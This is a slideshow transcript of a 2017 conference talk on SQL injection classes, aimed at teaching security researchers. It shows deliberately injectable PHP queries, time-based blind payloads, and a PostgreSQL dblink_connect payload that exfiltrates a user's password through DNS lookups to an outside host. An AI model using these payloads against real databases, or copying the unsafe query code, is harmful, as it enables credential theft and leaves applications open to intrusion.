Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Out-of-band SQL Injection Attacks (#istsec)

143 views

Published on

Istanbul Information Security Conference, #IstSec
Omer Citak, May 2017

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Out-of-band SQL Injection Attacks (#istsec)

  1. 1. whoami Security Researcher @ Netsparker Ltd. Developer @ Another Times Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  2. 2. sql injection ● Inband ○ Error Based ● Indirect Inference ○ Boolean Based ○ Blind (Time Based) ● Out-of-band ○ Blind (HTTP, DNS)
  3. 3. sql injection ● Inband ○ Error Based .... ini_set('display_errors', 'On'); error_reporting(E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  4. 4. sql injection ● Inband ○ Error Based
  5. 5. sql injection ● Indirect Inference ○ Boolean Based .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); $row_count = mysql_num_rows($results); if($row_count > 0) echo 'user exist'; else echo 'user not exist'; ...
  6. 6. sql injection ● Indirect Inference ○ Boolean Based
  7. 7. sql injection ● Indirect Inference ○ Blind (Time Based) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  8. 8. sql injection ● Indirect Inference ○ Blind (Time Based)
  9. 9. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --
  10. 10. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --
  11. 11. sql injection ● Out-of-band ○ Blind (HTTP, DNS) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')"; $results = pg_query($sql); ...
  12. 12. demo ● dependencies; ○ 1 DNS server => 207.154.221.107 ■ Ubuntu 16 ■ Spiderlab Responder ○ 1 app & database server => 46.101.229.160 ■ Ubuntu 16 ■ Php7 ■ Postgresql 9.5 and 1 unit attacker
  13. 13. demo SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')
  14. 14. demo SELECT * FROM users WHERE (username like '% '||'test'||'%')
  15. 15. demo SELECT * FROM users WHERE (username like '% '|| cast(test as numeric) ||'%')
  16. 16. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(test) as numeric) ||'%')
  17. 17. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect()) as numeric) ||'%')
  18. 18. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  19. 19. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host='||(select password from users where id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  20. 20. demo
  21. 21. where is the guvenlik?
  22. 22. thanks www.omercitak.com All Social Platform: @Om3rCitak

×